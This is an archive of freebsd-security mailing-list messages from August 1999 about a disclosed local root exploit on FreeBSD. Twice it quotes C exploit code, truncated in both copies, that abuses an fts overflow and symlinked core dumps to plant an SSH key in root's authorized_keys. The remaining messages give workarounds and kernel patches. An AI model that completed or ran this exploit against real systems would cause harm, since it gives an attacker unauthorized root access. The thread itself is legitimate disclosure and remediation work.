FreeBSD (and other BSDs?) local root explot Content-Type: application/pgp; format=text; x-action=sign -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 /* (c) 1999 babcia padlina ltd. bug in fts_print function allows to overwrite any file in system, when running /etc/security script (executed from 'daily' scripts). affected systems: - freebsd (all versions) - probably openbsd/netbsd fix: - limit root's coredump size - patch libc */ #include #include #include #include #include #define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n" #define FILE "/root/.ssh/authorized_keys" #define CORE "find.core" #define DEPTH 300 #define BUFSIZE 250 int makedir(dir, linkfrom, linkto) char *dir, *linkfrom, *linkto; { if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO))) return -1; if (chdir(dir)) return -1; if (symlink(linkfrom, linkto) < 0) return -1; return 0; } int main(argc, argv) int argc; char **argv; { int i = 0; char pid[10], buf[BUFSIZE]; sprintf(pid, "%d", getpid()); if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) { perror("mkdir()"); return -1; } if (chdir(pid)) { perror("chdir()"); return -1; } bzero(buf, BUFSIZE); memset(buf, 0x41, BUFSIZE-1); for(i=0;i X-Sender: hart@anchovy.orem.iserver.com To: Gregory Sutter Cc: security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <19990826094910.F20512@forty-two.egroups.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Aug 1999, Gregory Sutter wrote: > This claims to describe a FreeBSD root exploit, and was just posted > to BugTraq. ... and was posted to freebsd-security yesterday. ;-) > bug in fts_print function allows to overwrite any file in system, when > running /etc/security script (executed from 'daily' scripts). > > affected systems: > - freebsd (all versions) > - probably openbsd/netbsd > > fix: > - limit root's coredump size > - patch libc Tested and works on 3.2-STABLE of last week. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 9:57:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (Postfix) with ESMTP id 4E75D14E96; Thu, 26 Aug 1999 09:57:32 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon (simeon.sentex.ca [209.112.4.47]) by granite.sentex.net (8.8.8/8.6.9) with SMTP id MAA06123; Thu, 26 Aug 1999 12:56:29 -0400 (EDT) Message-Id: <3.0.5.32.19990826125500.01d258a0@staff.sentex.ca> X-Sender: mdtpop@staff.sentex.ca X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Thu, 26 Aug 1999 12:55:00 -0400 To: freebsd-security@freebsd.org From: Mike Tancsa Subject: New exploit ? Patch ? (from BUGTRAQ Aug26 1999) Cc: security-officer@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From BUGTRAQ today... ---Mike Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@securityfocus.com X-Mailer: XFMail 1.3 [p0] on Linux X-SMS: +48601383657@text.plusgsm.pl X-PGP: PGP key on WWW or finger X-Operating-System: FreeBSD 3.2-STABLE (i386) Date: Tue, 24 Aug 1999 23:47:05 +0200 Reply-To: Przemyslaw Frasunek Sender: Bugtraq List From: Przemyslaw Frasunek Organization: Lubelska Grupa Uzytkownikow BSD Subject: FreeBSD (and other BSDs?) local root explot X-To: bugtraq@securityfocus.com To: BUGTRAQ@SECURITYFOCUS.COM -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 /* (c) 1999 babcia padlina ltd. bug in fts_print function allows to overwrite any file in system, when running /etc/security script (executed from 'daily' scripts). affected systems: - freebsd (all versions) - probably openbsd/netbsd fix: - limit root's coredump size - patch libc */ #include #include #include #include #include #define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n" #define FILE "/root/.ssh/authorized_keys" #define CORE "find.core" #define DEPTH 300 #define BUFSIZE 250 int makedir(dir, linkfrom, linkto) char *dir, *linkfrom, *linkto; { if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO))) return -1; if (chdir(dir)) return -1; if (symlink(linkfrom, linkto) < 0) return -1; return 0; } int main(argc, argv) int argc; char **argv; { int i = 0; char pid[10], buf[BUFSIZE]; sprintf(pid, "%d", getpid()); if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) { perror("mkdir()"); return -1; } if (chdir(pid)) { perror("chdir()"); return -1; } bzero(buf, BUFSIZE); memset(buf, 0x41, BUFSIZE-1); for(i=0;i To: Gregory Sutter Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Cc: security-officer@freebsd.org, freebsd-security@freebsd.org In-reply-to: Your message of "Thu, 26 Aug 1999 09:49:10 PDT." <19990826094910.F20512@forty-two.egroups.net> References: <19990826094910.F20512@forty-two.egroups.net> Date: Thu, 26 Aug 1999 11:04:07 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990826094910.F20512@forty-two.egroups.net> Gregory Sutter writes: : This claims to describe a FreeBSD root exploit, and was just posted : to BugTraq. Thanks. They said they weren't goin to post this for a few more days... Grump. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 10:17:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id D4F4814C04 for ; Thu, 26 Aug 1999 10:17:14 -0700 (PDT) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.3/frmug-2.5/nospam) with UUCP id TAA02931 for freebsd-security@FreeBSD.ORG; Thu, 26 Aug 1999 19:13:55 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id DDA84870A; Thu, 26 Aug 1999 08:21:21 +0200 (CEST) Date: Thu, 26 Aug 1999 08:21:21 +0200 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Subject: Re: undelete Message-ID: <19990826082121.A53241@keltia.freenix.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <99Aug26.113851est.40335@border.alcanet.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.5i In-Reply-To: ; from David Scheidt on Wed, Aug 25, 1999 at 10:06:15PM -0500 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5543 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to David Scheidt: > What, exactly, is broken with LFS? Or, at least, when did it get broken? Apart from the fact that it was never finished, it didn't survive the unified VM/buffer cache that went in just after FreeBSD 2.0 in '95. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 10:32:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 599E614E90; Thu, 26 Aug 1999 10:32:15 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id LAA85117; Thu, 26 Aug 1999 11:32:15 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA65999; Thu, 26 Aug 1999 11:33:30 -0600 (MDT) Message-Id: <199908261733.LAA65999@harmony.village.org> To: Mike Tancsa Subject: Re: New exploit ? Patch ? (from BUGTRAQ Aug26 1999) Cc: freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG In-reply-to: Your message of "Thu, 26 Aug 1999 12:55:00 EDT." <3.0.5.32.19990826125500.01d258a0@staff.sentex.ca> References: <3.0.5.32.19990826125500.01d258a0@staff.sentex.ca> Date: Thu, 26 Aug 1999 11:33:30 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The quick and dirty workaround for this would be to move /usr/sbin/periodic to /usr/sbin/periodic.bin. Replace /usr/sbin/periodic with #!/bin/sh limits -c 0 /usr/sbin/periodic.bin $* Both the bug in the fts library and the dumping to core dumps through symbolic links which together conspire to have this bug are being fixed and there should be real commits soon. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 10:39:23 1999 Delivered-To: freebsd-security@freebsd.org Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (Postfix) with ESMTP id 33E2D15067; Thu, 26 Aug 1999 10:39:21 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.9.3/RDY&DVV) id KAA94664; Thu, 26 Aug 1999 10:38:51 -0700 (PDT) Message-Id: <199908261738.KAA94664@burka.rdy.com> Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <199908261704.LAA65785@harmony.village.org> from Warner Losh at "Aug 26, 1999 11:04:07 am" To: imp@village.org (Warner Losh) Date: Thu, 26 Aug 1999 10:38:51 -0700 (PDT) Cc: gsutter@pobox.com (Gregory Sutter), security-officer@freebsd.org, freebsd-security@freebsd.org X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh writes: > In message <19990826094910.F20512@forty-two.egroups.net> Gregory Sutter writes: > : This claims to describe a FreeBSD root exploit, and was just posted > : to BugTraq. > > Thanks. They said they weren't goin to post this for a few more > days... Grump. :-/ I've just committed a fix. > > Warner > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 10:44: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 714A6150D9; Thu, 26 Aug 1999 10:43:58 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id LAA85181; Thu, 26 Aug 1999 11:43:36 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id LAA66156; Thu, 26 Aug 1999 11:44:52 -0600 (MDT) Message-Id: <199908261744.LAA66156@harmony.village.org> To: dima@best.net Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Cc: gsutter@pobox.com (Gregory Sutter), security-officer@freebsd.org, freebsd-security@freebsd.org In-reply-to: Your message of "Thu, 26 Aug 1999 10:38:51 PDT." <199908261738.KAA94664@burka.rdy.com> References: <199908261738.KAA94664@burka.rdy.com> Date: Thu, 26 Aug 1999 11:44:52 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908261738.KAA94664@burka.rdy.com> Dima Ruban writes: : I've just committed a fix. Thanks Dima. It was first thing on my list after catching up on my email. Wanna write the advisory? Or at least give me verfied patch files? Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 11: 4:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from wopr.caltech.edu (wopr.caltech.edu [131.215.240.222]) by hub.freebsd.org (Postfix) with ESMTP id B646315D9B; Thu, 26 Aug 1999 11:04:06 -0700 (PDT) (envelope-from mph@wopr.caltech.edu) Received: (from mph@localhost) by wopr.caltech.edu (8.9.3/8.9.1) id LAA03113; Thu, 26 Aug 1999 11:03:02 -0700 (PDT) (envelope-from mph) Date: Thu, 26 Aug 1999 11:03:01 -0700 From: Matthew Hunt To: Warner Losh Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG Subject: Re: New exploit ? Patch ? (from BUGTRAQ Aug26 1999) Message-ID: <19990826110301.A3048@wopr.caltech.edu> References: <3.0.5.32.19990826125500.01d258a0@staff.sentex.ca> <199908261733.LAA65999@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <199908261733.LAA65999@harmony.village.org>; from Warner Losh on Thu, Aug 26, 1999 at 11:33:30AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Aug 26, 1999 at 11:33:30AM -0600, Warner Losh wrote: > #!/bin/sh > limits -c 0 > /usr/sbin/periodic.bin $* I believe "limits" should read "ulimit". "limits" is /usr/bin/limits, and "ulimit" is the /bin/sh builtin. wopr:~$ cat blah #!/bin/sh limits -c 0 limits ulimit -c 0 limits wopr:~$ ./blah Resource limits (current): coredumpsize 0 kb Resource limits (current): cputime infinity secs filesize infinity kb datasize 524288 kb stacksize 65536 kb coredumpsize infinity kb memoryuse infinity kb memorylocked infinity kb maxprocesses 128 openfiles 128 Resource limits (current): cputime infinity secs filesize infinity kb datasize 524288 kb stacksize 65536 kb coredumpsize 0 kb memoryuse infinity kb memorylocked infinity kb maxprocesses 128 openfiles 128 wopr:~$ uname -a FreeBSD wopr.caltech.edu 4.0-CURRENT FreeBSD 4.0-CURRENT #8: Thu Aug 26 09:13:16 PDT 1999 mph@wopr.caltech.edu:/a/src/sys/compile/WOPR i386 (Sources about 2 days old.) -- Matthew Hunt * Stay close to the Vorlon. http://www.pobox.com/~mph/ * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 11: 4:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from burka.rdy.com (burka.rdy.com [205.149.163.30]) by hub.freebsd.org (Postfix) with ESMTP id 9E89115DAA; Thu, 26 Aug 1999 11:04:11 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.9.3/RDY&DVV) id KAA94925; Thu, 26 Aug 1999 10:58:45 -0700 (PDT) Message-Id: <199908261758.KAA94925@burka.rdy.com> Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <199908261744.LAA66156@harmony.village.org> from Warner Losh at "Aug 26, 1999 11:44:52 am" To: imp@village.org (Warner Losh) Date: Thu, 26 Aug 1999 10:58:45 -0700 (PDT) Cc: dima@best.net, gsutter@pobox.com (Gregory Sutter), security-officer@freebsd.org, freebsd-security@freebsd.org X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh writes: > In message <199908261738.KAA94664@burka.rdy.com> Dima Ruban writes: > : I've just committed a fix. > > Thanks Dima. It was first thing on my list after catching up on my > email. Wanna write the advisory? Or at least give me verfied patch I'm not very good at writing advisories :-) > files? > > Warner > -- dima For -current: *** kern/imgact_elf.c 1999/07/09 19:10:14 1.61 --- kern/imgact_elf.c 1999/08/26 17:32:48 1.62 *************** *** 722,729 **** if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); --- 722,729 ---- if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); *** kern/imgact_aout.c 1999/05/17 00:53:36 1.52 --- kern/imgact_aout.c 1999/08/26 17:32:48 1.53 *************** *** 264,271 **** name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); --- 264,271 ---- name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); ----------cut here For 3.x-stable: *** kern/imgact_elf.c 1999/07/15 13:01:54 1.44.2.4 --- kern/imgact_elf.c 1999/08/26 17:35:03 1.44.2.5 *************** *** 699,706 **** if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); --- 699,706 ---- if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); *** kern/imgact_aout.c 1999/04/14 04:55:22 1.44.2.1 --- kern/imgact_aout.c 1999/08/26 17:35:02 1.44.2.2 *************** *** 259,266 **** name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, FOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); --- 259,266 ---- name = expand_name(p->p_comm, p->p_ucred->cr_uid, p->p_pid); if (name == NULL) return (EFAULT); /* XXX -- not the best error */ ! NDINIT(&nd, LOOKUP, NOFOLLOW, UIO_SYSSPACE, name, p); ! error = vn_open(&nd, O_CREAT | FWRITE | O_NOFOLLOW, S_IRUSR | S_IWUSR); free(name, M_TEMP); if (error) return (error); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 11: 5:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 45D0B15454; Thu, 26 Aug 1999 11:05:29 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA85336; Thu, 26 Aug 1999 12:05:20 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA66446; Thu, 26 Aug 1999 12:06:36 -0600 (MDT) Message-Id: <199908261806.MAA66446@harmony.village.org> To: Matthew Hunt Subject: Re: New exploit ? Patch ? (from BUGTRAQ Aug26 1999) Cc: Mike Tancsa , freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.ORG In-reply-to: Your message of "Thu, 26 Aug 1999 11:03:01 PDT." <19990826110301.A3048@wopr.caltech.edu> References: <19990826110301.A3048@wopr.caltech.edu> <3.0.5.32.19990826125500.01d258a0@staff.sentex.ca> <199908261733.LAA65999@harmony.village.org> Date: Thu, 26 Aug 1999 12:06:36 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <19990826110301.A3048@wopr.caltech.edu> Matthew Hunt writes: : On Thu, Aug 26, 1999 at 11:33:30AM -0600, Warner Losh wrote: : : > #!/bin/sh : > limits -c 0 : > /usr/sbin/periodic.bin $* : : I believe "limits" should read "ulimit". "limits" is /usr/bin/limits, : and "ulimit" is the /bin/sh builtin. : : wopr:~$ cat blah : #!/bin/sh : limits -c 0 : limits : ulimit -c 0 : limits i do believe that you are right. That's what I get for whipping out a test case w/o testing it completely... Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 11:11:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id F1A1D14D7D; Thu, 26 Aug 1999 11:11:14 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA85349; Thu, 26 Aug 1999 12:09:17 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA66492; Thu, 26 Aug 1999 12:10:32 -0600 (MDT) Message-Id: <199908261810.MAA66492@harmony.village.org> To: dima@best.net Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Cc: gsutter@pobox.com (Gregory Sutter), security-officer@freebsd.org, freebsd-security@freebsd.org In-reply-to: Your message of "Thu, 26 Aug 1999 10:58:45 PDT." <199908261758.KAA94925@burka.rdy.com> References: <199908261758.KAA94925@burka.rdy.com> Date: Thu, 26 Aug 1999 12:10:32 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199908261758.KAA94925@burka.rdy.com> Dima Ruban writes: : I'm not very good at writing advisories :-) OK. I'll write this up then. The verified patch files help a whole lot. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 11:31: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id AB2C2158BA for ; Thu, 26 Aug 1999 11:30:48 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Thu, 26 Aug 1999 12:30:05 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma017291; Thu, 26 Aug 99 12:29:39 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id MAA04809; Thu, 26 Aug 1999 12:28:45 -0600 (MDT) Date: Thu, 26 Aug 1999 12:28:44 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Warner Losh Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <199908261810.MAA66492@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Aug 1999, Warner Losh wrote: > The verified patch files help a whole lot. Has anyone investigated patches to the fts(3) functions in libc? We've seen kernel patches (to stop following symbolic links when dumping core?) but it would be nice to fix the fts(3) bugs as well that started all of this. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 11:46:56 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 8DB5D14D4D for ; Thu, 26 Aug 1999 11:46:53 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id MAA85530; Thu, 26 Aug 1999 12:45:09 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA66821; Thu, 26 Aug 1999 12:46:25 -0600 (MDT) Message-Id: <199908261846.MAA66821@harmony.village.org> To: Paul Hart Subject: Re: FreeBSD (and other BSDs?) local root explot] Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 26 Aug 1999 12:28:44 MDT." References: Date: Thu, 26 Aug 1999 12:46:25 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Paul Hart writes: : Has anyone investigated patches to the fts(3) functions in libc? We've : seen kernel patches (to stop following symbolic links when dumping core?) : but it would be nice to fix the fts(3) bugs as well that started all of : this. Bruce has done that. He's trying to get them to the point he's happy with them and track down all the implied POSIX issues that might result from changing fts. I will admit that I've been slow in the past to review some of the changes he wanted to make to fix this problem, mostly due to heavy work loads at the time. In the past few days several patches to different areas of the system have been flooding through my mailbox for review on this problem. This is both good and bad. This exploit pointed out several bugs. periodic shouldn't allow its children to dump core (since you don't want new core files in your dump every day), core dumps *MUST*NOT* follow symbolic links (which they didn't do in 2.x, but there was some back sliding in 3.x and 4.x in this area), fts has an overflow which can cause problems in large, wide trees. Had any one of these been different, the problem would not have happened. There are also some downstream issues with many programs not doing proper error checking (eg, if ssh sees bogons in its authorized_keys file, it should abort not ignore them), but that doesn't solve the "file assasination" problems, it merely works around them. I'm working on some administrivia right now to get the advisories to happen properly... Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 11:53:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from furbie.euronet.nl (furbie.euronet.nl [194.134.32.150]) by hub.freebsd.org (Postfix) with ESMTP id D9A02152D1 for ; Thu, 26 Aug 1999 11:53:20 -0700 (PDT) (envelope-from beng@furbie.euronet.nl) Received: (from beng@localhost) by furbie.euronet.nl (8.9.3/8.9.3) id SAA04153 for freebsd-security@freebsd.org; Thu, 26 Aug 1999 18:51:24 GMT (envelope-from beng) Date: Thu, 26 Aug 1999 20:51:24 +0200 From: Ben Gras To: freebsd-security@freebsd.org Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Message-ID: <19990826205124.A3588@euronet.nl> References: <19990826094910.F20512@forty-two.egroups.net> <199908261704.LAA65785@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.5i In-Reply-To: <199908261704.LAA65785@harmony.village.org>; from Warner Losh on Thu, Aug 26, 1999 at 11:04:07AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org All, On Thu, Aug 26, 1999 at 11:04:07AM -0600, Warner Losh wrote: > In message <19990826094910.F20512@forty-two.egroups.net> Gregory Sutter writes: > : This claims to describe a FreeBSD root exploit, and was just posted > : to BugTraq. > Thanks. They said they weren't goin to post this for a few more > days... Grump. First of all: a fix for this (AFAICS), and good practice regardless, is to set kern.corefile to something where this kind of fiddling can't happen. A nice example is a variation of what's in the source: /var/cores/%U/%N-%P. This could be done along with a # mkdir -m 755 /var/cores # cd /var/cores && \ for i in `awk -F: '{ print $3 }' /etc/passwd` do mkdir -m 700 $i && chown $i $i || echo $i failed done and a hook in adduser/rmuser perhaps. The above should be done for every possible root, i.e., also for e.g. chrooted ftpd and httpd. /var/cores is used instead of /cores because you don't want users to be able to write on /, and /var/tmp is often user-writable anyway (as always, tune to meet local needs). If you want cores to work if /var isn't mounted, create a /var/cores on / and do the above there too (it might be useful one day). This provides a lot more security against core files lying around, or, in this case, being dumped where they shouldn't be, and eliminates this class of weakness. I'll mail my patch for sysctls for cores-are-created-when-written-at-all (a la O_CREAT | O_EXCL) and symlinks-aren't-followed-on-cores on 3.2-R to Warner. Unforunately this had to be (well, without further kludging) hard-wired into the various core dumping functions (elf, aout; fortunately the linux code shares these functions and there's no COFF coredumping function). Regards, =Ben To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 13:58:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from implode.root.com (root.com [209.102.106.178]) by hub.freebsd.org (Postfix) with ESMTP id C8EE414D7D; Thu, 26 Aug 1999 13:58:54 -0700 (PDT) (envelope-from dg@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.8/8.8.5) with ESMTP id NAA03100; Thu, 26 Aug 1999 13:56:29 -0700 (PDT) Message-Id: 